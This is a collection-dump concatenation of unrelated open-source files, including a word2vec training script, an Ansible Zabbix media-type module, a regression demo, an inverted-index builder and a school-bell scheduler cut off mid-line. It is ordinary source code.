jobs = []
# ------ pre-processing text ------
logger.info("Preprocessing text")
# Load data and normalize the text
with open(args.input, 'r', encoding="utf-8") as input:
text = input.read()
# Split on new lines and remove empty lines
labels_list = [x.split('\t') for x in list(
filter(None, text.encode('utf-8').decode('utf-8').split('\n')))]
# Select the words based on the depth level
word_list = pre_processing(labels_list, args.level)
# ------ end pre-processing text ------
# Train models
for size in args.sizes:
for window in args.windows:
for count in args.counts:
try:
if args.mp == True:
p = multiprocessing.Process(target=run_w2v_model,
args=(args.outputfolder, word_list, args.cbow, args.prefix, size, count, window, args.plot))
jobs.append(p)
p.start()
# else:
# output = os.path.abspath(os.path.join(args.outputfolder,
# args.prefix + '_s' + str(size) + '_ws'+str(window)+'_c'+str(count)+'.model'))
run_w2v_model(args.outputfolder, word_list, args.cbow,
args.prefix, size, count, window, args.plot)
except ValueError:
logger.error(
"Value error instantiating the grid.", exc_info=True)
sys.exit(1)
except TypeError:
logger.error(
"Type error building the grid.", exc_info=True)
sys.exit(1)
if __name__ == "__main__":
main(sys.argv[1:])
with open("data/barcelona/geotext_sequences/barcelona_100__test_distance.txt", 'r', encoding="utf-8") as input:
text = input.read()
| 34.409692 | 144 | 0.495839 |
7fe186869b6e2c2057a444929ef8ce5e1713aef7
| 589 |
py
|
Python
|
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | 1 |
2020-12-18T02:42:23.000Z
|
2020-12-18T02:42:23.000Z
|
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
from ._dcunet_architectures import make_unet_encoder_decoder_args
# fmt: off
DCCRN_ARCHITECTURES = {
"DCCRN-CL": make_unet_encoder_decoder_args(
# Encoders:
# (in_chan, out_chan, kernel_size, stride, padding)
[
( 1, 32, (5, 2), (2, 1), (2, 0)),
( 32, 64, (5, 2), (2, 1), (2, 1)),
( 64, 128, (5, 2), (2, 1), (2, 0)),
(128, 256, (5, 2), (2, 1), (2, 1)),
(256, 256, (5, 2), (2, 1), (2, 0)),
(256, 256, (5, 2), (2, 1), (2, 1)),
],
# Decoders: auto
"auto",
),
}
| 29.45 | 65 | 0.427844 |
e9ef11a39c98c5d3cf19544fc6454e555cfa3890
| 1,090 |
py
|
Python
|
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
import numpy as np
import numpy.random as rand
import scipy as sp
import matplotlib.pyplot as plt
def gen_training(func, x, var=1):
y = func(x)
y += rand.normal(0, var, y.shape)
return y
def const(x):
return lambda y: x
def lms(funcs, x, y, alpha):
(m,) = x.shape
(n,) = funcs.shape
w = np.zeros(n)
for c in range(10000):
for i in range(m):
for j in range(n):
val = 0
for k in range(n):
val += funcs[k](x[i]) * w[k]
w[j] = w[j] + alpha * x[i] * (y[i] - val)
return w
def build_func(funcs, w):
(n,) = funcs.shape
def f(x):
val = 0
for i in range(n):
val += funcs[i](x) * w[i]
return val
return f
# (x, y) = gen_training(lambda x: x, 0, 2*np.pi, 100)
x = np.linspace(0, 2*np.pi, 100)
y = gen_training(lambda x: np.sin(x) + (x/np.pi)**2, x, 0.2)
funcs = np.array([const(1), np.sin, lambda x:x**2])
w = lms(funcs, x, y, 0.0001)
f = build_func(funcs, w)
print(w)
plt.scatter(x, y)
plt.plot(x, f(x))
plt.show()
| 20.185185 | 60 | 0.516514 |
62ea174757e4ab24dcf18dfa87893e80754eb324
| 25,749 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: zabbix_mediatype
short_description: Create/Update/Delete Zabbix media types
description:
- This module allows you to create, modify and delete Zabbix media types.
author:
- Ruben Tsirunyan (@rubentsirunyan)
requirements:
- "zabbix-api >= 0.5.4"
options:
name:
type: 'str'
description:
- Name of the media type.
required: true
state:
type: 'str'
description:
- Desired state of the mediatype.
- On C(present), it will create a mediatype if it does not exist or update the mediatype if the associated data is different.
- On C(absent), it will remove the mediatype if it exists.
choices:
- present
- absent
default: 'present'
type:
type: 'str'
description:
- Type of the media type.
- Media types I(jabber) and I(ez_texting) workable only with Zabbix 4.2 or less.
choices:
- email
- script
- sms
- jabber
- ez_texting
required: true
status:
type: 'str'
description:
- Whether the media type is enabled or no.
choices:
- enabled
- disabled
default: 'enabled'
max_sessions:
type: 'int'
description:
- The maximum number of alerts that can be processed in parallel.
- Possible value is 1 when I(type=sms) and 0-100 otherwise.
default: 1
max_attempts:
type: 'int'
description:
- The maximum number of attempts to send an alert.
- Possible range is 0-10
default: 3
attempt_interval:
type: 'int'
description:
- The interval between retry attempts.
- Possible range is 0-60
default: 10
script_name:
type: 'str'
description:
- The name of the executed script.
- Required when I(type=script).
script_params:
type: 'list'
elements: str
description:
- List of script parameters.
- Required when I(type=script).
gsm_modem:
type: 'str'
description:
- Serial device name of the gsm modem.
- Required when I(type=sms).
username:
type: 'str'
description:
- Username or Jabber identifier.
- Required when I(type=jabber) or I(type=ez_texting).
- Required when I(type=email) and I(smtp_authentication=true).
password:
type: 'str'
description:
- Authentication password.
- Required when I(type=jabber) or I(type=ez_texting).
- Required when I(type=email) and I(smtp_authentication=true).
smtp_server:
type: 'str'
description:
- SMTP server host.
- Required when I(type=email).
default: 'localhost'
smtp_server_port:
type: 'int'
description:
- SMTP server port.
- Required when I(type=email).
default: 25
smtp_helo:
type: 'str'
description:
- SMTP HELO.
- Required when I(type=email).
default: 'localhost'
smtp_email:
type: 'str'
description:
- Email address from which notifications will be sent.
- Required when I(type=email).
smtp_authentication:
type: 'bool'
description:
- Whether SMTP authentication with username and password should be enabled or not.
- If set to C(true), C(username) and C(password) should be specified.
default: false
smtp_security:
type: 'str'
description:
- SMTP connection security level to use.
choices:
- None
- STARTTLS
- SSL/TLS
smtp_verify_host:
type: 'bool'
description:
- SSL verify host for SMTP.
- Can be specified when I(smtp_security=STARTTLS) or I(smtp_security=SSL/TLS)
default: false
smtp_verify_peer:
type: 'bool'
description:
- SSL verify peer for SMTP.
- Can be specified when I(smtp_security=STARTTLS) or I(smtp_security=SSL/TLS)
default: false
message_text_limit:
type: 'str'
description:
- The message text limit.
- Required when I(type=ez_texting).
- 160 characters for USA and 136 characters for Canada.
choices:
- USA
- Canada
extends_documentation_fragment:
- community.general.zabbix
'''
RETURN = r''' # '''
EXAMPLES = r'''
- name: 'Create an email mediatype with SMTP authentication'
zabbix_mediatype:
name: "Ops email"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'email'
smtp_server: 'example.com'
smtp_server_port: 2000
smtp_email: '[email protected]'
smtp_authentication: true
username: 'smtp_user'
password: 'smtp_pass'
- name: 'Create a script mediatype'
zabbix_mediatype:
name: "my script"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'script'
script_name: 'my_script.py'
script_params:
- 'arg1'
- 'arg2'
- name: 'Create a jabber mediatype'
zabbix_mediatype:
name: "My jabber"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'jabber'
username: 'jabber_id'
password: 'jabber_pass'
- name: 'Create an SMS mediatype'
zabbix_mediatype:
name: "My SMS Mediatype"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'sms'
gsm_modem: '/dev/ttyS0'
'''
import atexit
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from distutils.version import LooseVersion
try:
from zabbix_api import ZabbixAPI
HAS_ZABBIX_API = True
except ImportError:
ZBX_IMP_ERR = traceback.format_exc()
HAS_ZABBIX_API = False
def to_numeric_value(value, strs):
return strs.get(value)
def validate_params(module, params):
"""Validates arguments that are required together.
Fails the module with the message that shows the missing
requirements if there are some.
Args:
module: AnsibleModule object.
params (list): Each element of this list
is a list like
['argument_key', 'argument_value', ['required_arg_1',
'required_arg_2']].
Format is the same as `required_if` parameter of AnsibleModule.
"""
for param in params:
if module.params[param[0]] == param[1]:
if None in [module.params[i] for i in param[2]]:
module.fail_json(
msg="Following arguments are required when {key} is {value}: {arguments}".format(
key=param[0],
value=param[1],
arguments=', '.join(param[2])
)
)
def construct_parameters(**kwargs):
"""Translates data to a format suitable for Zabbix API and filters
the ones that are related to the specified mediatype type.
Args:
**kwargs: Arguments passed to the module.
Returns:
A dictionary of arguments that are related to kwargs['transport_type'],
and are in a format that is understandable by Zabbix API.
"""
if kwargs['transport_type'] == 'email':
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
smtp_server=kwargs['smtp_server'],
smtp_port=str(kwargs['smtp_server_port']),
smtp_helo=kwargs['smtp_helo'],
smtp_email=kwargs['smtp_email'],
smtp_security=to_numeric_value(str(kwargs['smtp_security']),
{'None': '0',
'STARTTLS': '1',
'SSL/TLS': '2'}),
smtp_authentication=to_numeric_value(str(kwargs['smtp_authentication']),
{'False': '0',
'True': '1'}),
smtp_verify_host=to_numeric_value(str(kwargs['smtp_verify_host']),
{'False': '0',
'True': '1'}),
smtp_verify_peer=to_numeric_value(str(kwargs['smtp_verify_peer']),
{'False': '0',
'True': '1'}),
username=kwargs['username'],
passwd=kwargs['password']
)
elif kwargs['transport_type'] == 'script':
if kwargs['script_params'] is None:
_script_params = '' # ZBX-15706
else:
_script_params = '\n'.join(str(i) for i in kwargs['script_params']) + '\n'
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
exec_path=kwargs['script_name'],
exec_params=_script_params
)
elif kwargs['transport_type'] == 'sms':
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
gsm_modem=kwargs['gsm_modem']
)
elif kwargs['transport_type'] == 'jabber' and LooseVersion(kwargs['zbx_api_version']) <= LooseVersion('4.2'):
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
username=kwargs['username'],
passwd=kwargs['password']
)
elif kwargs['transport_type'] == 'ez_texting' and LooseVersion(kwargs['zbx_api_version']) <= LooseVersion('4.2'):
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
username=kwargs['username'],
passwd=kwargs['password'],
exec_path=to_numeric_value(kwargs['message_text_limit'],
{'USA': '0',
'Canada': '1'}),
)
return {'unsupported_parameter': kwargs['transport_type'], 'zbx_api_version': kwargs['zbx_api_version']}
def check_if_mediatype_exists(module, zbx, name, zbx_api_version):
"""Checks if mediatype exists.
Args:
module: AnsibleModule object
zbx: ZabbixAPI object
name: Zabbix mediatype name
Returns:
Tuple of (True, `id of the mediatype`) if mediatype exists, (False, None) otherwise
"""
filter_key_name = 'description'
if LooseVersion(zbx_api_version) >= LooseVersion('4.4'):
# description key changed to name key from zabbix 4.4
filter_key_name = 'name'
try:
mediatype_list = zbx.mediatype.get({
'output': 'extend',
'filter': {filter_key_name: [name]}
})
if len(mediatype_list) < 1:
return False, None
else:
return True, mediatype_list[0]['mediatypeid']
except Exception as e:
module.fail_json(msg="Failed to get ID of the mediatype '{name}': {e}".format(name=name, e=e))
def diff(existing, new):
"""Constructs the diff for Ansible's --diff option.
Args:
existing (dict): Existing mediatype data.
new (dict): New mediatype data.
Returns:
A dictionary like {'before': existing, 'after': new}
with filtered empty values.
"""
before = {}
after = {}
for key in new:
before[key] = existing[key]
if new[key] is None:
after[key] = ''
else:
after[key] = new[key]
return {'before': before, 'after': after}
def get_update_params(module, zbx, mediatype_id, **kwargs):
"""Filters only the parameters that are different and need to be updated.
Args:
module: AnsibleModule object.
zbx: ZabbixAPI object.
mediatype_id (int): ID of the mediatype to be updated.
**kwargs: Parameters for the new mediatype.
Returns:
A tuple where the first element is a dictionary of parameters
that need to be updated and the second one is a dictionary
returned by diff() function with
existing mediatype data and new params passed to it.
"""
existing_mediatype = zbx.mediatype.get({
'output': 'extend',
'mediatypeids': [mediatype_id]
})[0]
if existing_mediatype['type'] != kwargs['type']:
return kwargs, diff(existing_mediatype, kwargs)
else:
params_to_update = {}
for key in kwargs:
if (not (kwargs[key] is None and existing_mediatype[key] == '')) and kwargs[key] != existing_mediatype[key]:
params_to_update[key] = kwargs[key]
return params_to_update, diff(existing_mediatype, kwargs)
def delete_mediatype(module, zbx, mediatype_id):
try:
return zbx.mediatype.delete([mediatype_id])
except Exception as e:
module.fail_json(msg="Failed to delete mediatype '{_id}': {e}".format(_id=mediatype_id, e=e))
def update_mediatype(module, zbx, **kwargs):
try:
mediatype_id = zbx.mediatype.update(kwargs)
except Exception as e:
module.fail_json(msg="Failed to update mediatype '{_id}': {e}".format(_id=kwargs['mediatypeid'], e=e))
def create_mediatype(module, zbx, **kwargs):
try:
mediatype_id = zbx.mediatype.create(kwargs)
except Exception as e:
module.fail_json(msg="Failed to create mediatype '{name}': {e}".format(name=kwargs['description'], e=e))
def main():
argument_spec = dict(
server_url=dict(type='str', required=True, aliases=['url']),
login_user=dict(type='str', required=True),
login_password=dict(type='str', required=True, no_log=True),
http_login_user=dict(type='str', required=False, default=None),
http_login_password=dict(type='str', required=False, default=None, no_log=True),
validate_certs=dict(type='bool', required=False, default=True), timeout=dict(type='int', default=10),
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['present', 'absent']),
type=dict(type='str', choices=['email', 'script', 'sms', 'jabber', 'ez_texting'], required=True),
status=dict(type='str', default='enabled', choices=['enabled', 'disabled'], required=False),
max_sessions=dict(type='int', default=1, required=False),
max_attempts=dict(type='int', default=3, required=False),
attempt_interval=dict(type='int', default=10, required=False),
# Script
script_name=dict(type='str', required=False),
script_params=dict(type='list', required=False),
# SMS
gsm_modem=dict(type='str', required=False),
# Jabber
username=dict(type='str', required=False),
password=dict(type='str', required=False, no_log=True),
# Email
smtp_server=dict(type='str', default='localhost', required=False),
smtp_server_port=dict(type='int', default=25, required=False),
smtp_helo=dict(type='str', default='localhost', required=False),
smtp_email=dict(type='str', required=False),
smtp_security=dict(type='str', required=False, choices=['None', 'STARTTLS', 'SSL/TLS']),
smtp_authentication=dict(type='bool', default=False, required=False),
smtp_verify_host=dict(type='bool', default=False, required=False),
smtp_verify_peer=dict(type='bool', default=False, required=False),
# EZ Text
message_text_limit=dict(type='str', required=False, choices=['USA', 'Canada'])
)
required_params = [
['type', 'email', ['smtp_email']],
['type', 'script', ['script_name']],
['type', 'sms', ['gsm_modem']],
['type', 'jabber', ['username', 'password']],
['type', 'ez_texting', ['username', 'password', 'message_text_limit']],
['smtp_authentication', True, ['username', 'password']]
]
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
if module.params['state'] == 'present':
validate_params(module, required_params)
if not HAS_ZABBIX_API:
module.fail_json(msg=missing_required_lib('zabbix-api', url='https://pypi.org/project/zabbix-api/'), exception=ZBX_IMP_ERR)
server_url = module.params['server_url']
login_user = module.params['login_user']
login_password = module.params['login_password']
http_login_user = module.params['http_login_user']
http_login_password = module.params['http_login_password']
validate_certs = module.params['validate_certs']
state = module.params['state']
timeout = module.params['timeout']
name = module.params['name']
transport_type = module.params['type']
status = module.params['status']
max_sessions = module.params['max_sessions']
max_attempts = module.params['max_attempts']
attempt_interval = module.params['attempt_interval']
# Script
script_name = module.params['script_name']
script_params = module.params['script_params']
# SMS
gsm_modem = module.params['gsm_modem']
# Jabber
username = module.params['username']
password = module.params['password']
# Email
smtp_server = module.params['smtp_server']
smtp_server_port = module.params['smtp_server_port']
smtp_helo = module.params['smtp_helo']
smtp_email = module.params['smtp_email']
smtp_security = module.params['smtp_security']
smtp_authentication = module.params['smtp_authentication']
smtp_verify_host = module.params['smtp_verify_host']
smtp_verify_peer = module.params['smtp_verify_peer']
# EZ Text
message_text_limit = module.params['message_text_limit']
zbx = None
# login to zabbix
try:
zbx = ZabbixAPI(server_url, timeout=timeout, user=http_login_user, passwd=http_login_password,
validate_certs=validate_certs)
zbx.login(login_user, login_password)
atexit.register(zbx.logout)
except Exception as e:
module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
zbx_api_version = zbx.api_version()[:3]
mediatype_exists, mediatype_id = check_if_mediatype_exists(module, zbx, name, zbx_api_version)
parameters = construct_parameters(
name=name,
transport_type=transport_type,
status=status,
max_sessions=max_sessions,
max_attempts=max_attempts,
attempt_interval=attempt_interval,
script_name=script_name,
script_params=script_params,
gsm_modem=gsm_modem,
username=username,
password=password,
smtp_server=smtp_server,
smtp_server_port=smtp_server_port,
smtp_helo=smtp_helo,
smtp_email=smtp_email,
smtp_security=smtp_security,
smtp_authentication=smtp_authentication,
smtp_verify_host=smtp_verify_host,
smtp_verify_peer=smtp_verify_peer,
message_text_limit=message_text_limit,
zbx_api_version=zbx_api_version
)
if 'unsupported_parameter' in parameters:
module.fail_json(msg="%s is unsupported for Zabbix version %s" % (parameters['unsupported_parameter'], parameters['zbx_api_version']))
if LooseVersion(zbx_api_version) >= LooseVersion('4.4'):
# description key changed to name key from zabbix 4.4
parameters['name'] = parameters.pop('description')
if mediatype_exists:
if state == 'absent':
if module.check_mode:
module.exit_json(
changed=True,
msg="Mediatype would have been deleted. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
mediatype_id = delete_mediatype(module, zbx, mediatype_id)
module.exit_json(
changed=True,
msg="Mediatype deleted. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
else:
params_to_update, diff = get_update_params(module, zbx, mediatype_id, **parameters)
if params_to_update == {}:
module.exit_json(
changed=False,
msg="Mediatype is up to date: {name}".format(name=name)
)
else:
if module.check_mode:
module.exit_json(
changed=True,
diff=diff,
msg="Mediatype would have been updated. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
mediatype_id = update_mediatype(
module, zbx,
mediatypeid=mediatype_id,
**params_to_update
)
module.exit_json(
changed=True,
diff=diff,
msg="Mediatype updated. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
else:
if state == "absent":
module.exit_json(changed=False)
else:
if module.check_mode:
module.exit_json(
changed=True,
msg="Mediatype would have been created. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
mediatype_id = create_mediatype(module, zbx, **parameters)
module.exit_json(
changed=True,
msg="Mediatype created: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
if __name__ == '__main__':
main()
| 36.471671 | 142 | 0.553148 |
c5787987f7722da3d142634c98afc7e5af4beb9c
| 416 |
py
|
Python
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 395 |
2017-02-24T02:59:29.000Z
|
2022-03-31T15:48:19.000Z
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 7 |
2020-03-17T08:33:00.000Z
|
2021-09-02T23:10:46.000Z
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 235 |
2017-03-14T03:31:38.000Z
|
2022-03-29T16:14:51.000Z
|
from .models import User
from coffee.models import Spot
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
# spot = serializers.PrimaryKeyRelatedField(many=True, queryset=Spot.objects.all())
class Meta:
model = User
fields = ('id', 'username', 'email', 'nickname', 'bio', 'url',
'location', 'avatar', 'client_mark', 'weixin_nickName', 'weixin_avatarUrl')
| 29.714286 | 85 | 0.725962 |
9ab91a0b1ab584a15907d88c384698640f1b442c
| 1,091 |
py
|
Python
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
from CommonServerUserPython import *
from itertools import cycle
# Executes confluera-fetch-detections command/script
detections_data = demisto.executeCommand('confluera-fetch-detections', {'hours': '72'})
if detections_data[1] and detections_data[1]['Contents']:
detections = detections_data[1]['Contents']
else:
detections = []
# Generating Chart data
data: List[dict] = []
colors = cycle([
'#dc5e50',
'#64bb18',
'#8b639a',
'#d8a747',
'#528fb2',
'#9cc5aa',
'#f1934c',
'#e25b4c',
'#5bbe80',
'#c0363f',
'#cdb8a8',
'#3cc861'])
for idx, ioc in enumerate(detections):
element = [item for item in data if item['name'] == ioc['iocTactic']]
if element and len(element) != 0:
element[0]['data'][0] += 1
else:
chart_item = {
"name": ioc['iocTactic'],
"data": [1],
"color": next(colors)
}
data.append(chart_item)
return_results({
"Type": 17,
"ContentsFormat": "pie",
"Contents": {
"stats": data
}
})
| 21.82 | 87 | 0.586618 |
4955359c3848735b8bed30a788d7aa281954b644
| 1,312 |
py
|
Python
|
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
# 建立反向索引表
# v2: 盡可能避免奇怪的標點符號阻礙判斷
from ckiptagger import WS
import json
import sqlite3
from tqdm import tqdm
import re
# Reference: https://github.com/ckiplab/ckiptagger/wiki/Chinese-README
# Download models for ckiptagger
# from ckiptagger import data_utils
# data_utils.download_data_gdown("./")
ws = WS("./data")
with open('./wiki_2021_10_05_50000.json', 'r', encoding="utf-8") as f:
data = json.load(f)
database = './table-v2.db'
conn = sqlite3.connect(database)
cursor = conn.cursor()
cursor.execute('DELETE FROM inverted_table')
conn.commit()
batch_size = 200
reg = "[\s\-,.。\::!!;;\??()\(\)\"\'《》〈〉.~—─\=「」『』、”“·/\#\[\]]"
for index in tqdm(range(len(data) // batch_size)):
input = []
for i in range(batch_size):
input.append(re.sub(reg, " ", data[index * batch_size + i]['articles']))
input.append(re.sub(reg, " ", data[index * batch_size + i]['title']))
text = ws(input)
for i in range(batch_size):
pos = 0
for key in text[i*2] + text[i*2+1]:
key = key.strip()
if key != "":
cursor.execute('INSERT INTO inverted_table(term, aid, pos) VALUES(?, ?, ?)',
(key, data[index * batch_size + i]['id'], pos))
pos += 1
conn.commit()
cursor.close()
conn.close()
| 26.24 | 92 | 0.589177 |
65a0bea5651546842d1e6d77c5339b3d7bb51952
| 1,616 |
py
|
Python
|
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | 6 |
2017-04-12T14:05:19.000Z
|
2021-01-29T11:23:50.000Z
|
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | null | null | null |
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | null | null | null |
import random as rand
class WordDict:
"""
Allows creating a random sentence.
"""
def __init__(self, word_dict: list):
"""
Creates an WordDict object from a list of words.
which will be used as random word source
:param word_dict: A list of words
"""
self._ger_word_dict = word_dict
def load_from_textfile(input_file_path: str, enc="UTF8"):
"""
Creates an WordDict object from an text file.
:param input_file_path: The path to the text file
:param enc: The encoding of the text file.
:return: A WordDict object
"""
ger_word_dict = []
with open(input_file_path, encoding=enc) as f:
for line in f:
words = line.split(sep=' ')
words[len(words) - 1] = words[len(words) - 1].replace('\n', '')
ger_word_dict.extend(words)
return WordDict(ger_word_dict)
def get_sentence(self, word_count: int):
"""
Creates an sentence with <word_count> words
:param word_count: The number of words in the returned sentence
:return: A string containing random words
"""
sentence = ""
for i in range(word_count):
r_int = rand.randint(0, len(self._ger_word_dict) - 1)
rand_word = self._ger_word_dict[r_int]
sentence += rand_word + " "
return sentence
def get_word_count(self):
"""
Returns the size of word dict
:return: The size of words in the WordDict
"""
return len(self._ger_word_dict)
| 32.32 | 79 | 0.58354 |
65c82d8c5206cc1c5dbd02a624082dfce464b9e5
| 1,972 |
py
|
Python
|
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
# pendulum datetime plugin ??
# ajastamine APScheduler
import sys
import os
import json
import time
from graphqlclient import GraphQLClient
from apscheduler.schedulers.background import BackgroundScheduler
from datetime import datetime
from pygame import mixer
client = GraphQLClient('https://api.graph.cool/simple/v1/cj7ebm8yt0m9s0114ngjezyec')
now = time.localtime()
mixer.init()
sisse = mixer.Sound("1.wav")
valja = mixer.Sound("2.wav")
sees = client.execute(
'''
query {allOnoffs {isSees}}
'''
)
ajad = client.execute('''
query {allHelins {
bell
hour
minute
}}
''')
print('Hetkel on kell: %s' % datetime.now())
parsed_sees = json.loads(sees)
playing = parsed_sees['data']['allOnoffs'][0]['isSees']
parsed_ajad = json.loads(ajad)
# print(parsed_ajad['data']['allHelins'])
helinate_arv = len(parsed_ajad['data']['allHelins'])
print ('helinate arv on: ' + str(helinate_arv))
# print(parsed_ajad['data']['allHelins'][0])
def tick(x):
print('Tick! Kell on praegu: %s' % datetime.now())
print('Helin on ' + str(x % 2))
# sisse ja v2ljahelinaga variant
# if x%2 == 1:
# sisse.play()
#
# else:
# valja.play()
# ainult sissehelinaga
sisse.play()
if __name__ == '__main__' and playing:
scheduler = BackgroundScheduler()
for x in range(helinate_arv):
scheduler.add_job(tick, 'cron',[x], day_of_week='mon-fri', hour=parsed_ajad['data']['allHelins'][x]['hour'],
